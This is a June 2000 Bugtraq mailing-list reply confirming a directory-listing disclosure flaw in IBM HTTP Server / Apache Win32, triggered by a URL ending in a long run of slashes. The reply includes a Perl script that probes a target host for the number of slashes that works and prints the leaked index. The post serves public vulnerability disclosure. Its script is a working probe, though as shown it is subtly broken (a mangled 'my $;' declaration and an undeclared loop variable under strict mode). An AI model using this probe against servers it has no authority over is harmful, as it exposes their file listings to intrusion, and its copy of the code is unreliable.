Bugtraq mailing list archives
Re: IBM HTTP SERVER / APACHE
From: hdm () SECUREAUSTIN COM (H D Moore)
Date: Thu, 1 Jun 2000 09:52:38 -0500
Hi, I verified this on IBM_HTTP_SERVER/1.3.3 Apache/1.3.4-dev (Win32). The number of /'s needed were exactly the same number as Marek stated in his original email (211 being the key number to retrieve an index listing). Appended is an example perl script for finding _your_ magic number. Is this a bug merely in IBM HTTPD or Apache Win32 in general? Does IBM set some odd compile flag which triggers this bug in thier version? Anyone from the Apache group care to comment? -HD http://www.secureaustin.com (spidermap/nlog/etc) Marek Roy wrote:
I haven't seen any advisories for IBM HTTP SERVER running Apache.
[ snip ]
The number of "/" used to reproduce this can be different from one server to another. I don't have enough time to do more testing. However, feel free to add some more info to this quick advisory.
----[ sample scan script to find / offset ]---- (OMG its PERL ;) #!/usr/bin/perl use LWP::Simple; use strict; my $host = shift() || die "usage: $ARGV[0] [hostname]"; my $cnt; my $data; my $odata; my $; $odata = get("http://$host/"); if ($odata eq "") { die "no response from server: $host\n"; } for ($i = 2; $i < 4096; $i++) { print "Trying $i...\n"; $data = get("http://$host" . ("/" x $i)); if ($data ne $odata) { print "/ = $i\n\n$data\n\n"; exit; } }
Current thread:
- Re: IBM HTTP SERVER / APACHE typo () INFERNO TUSCULUM EDU (Jun 01)
- <Possible follow-ups>
- Re: IBM HTTP SERVER / APACHE H D Moore (Jun 01)
- Re: IBM HTTP SERVER / APACHE Luke Harless (Jun 01)
- Security Administration comes to LISA 2000 Cat Okita (Jun 01)
- Remote DoS attack in RealServer: USSR-2000043 David Cotter (Jun 01)
- ipx storm Jacek Lipkowski (Jun 02)
- Microsoft Security Bulletin (MS00-032) Microsoft Product Security (Jun 02)
- Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability Ussr Labs (Aug 02)
- Piranha password file frostman () SECUREACCESS INTRANETS COM (Jun 02)
- Re: Piranha password file arkth (Jun 08)
- Re: Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability Alfred Perlstein (Jun 02)
- New Allaire Security Zone Bulletins Aleph One (Jun 08)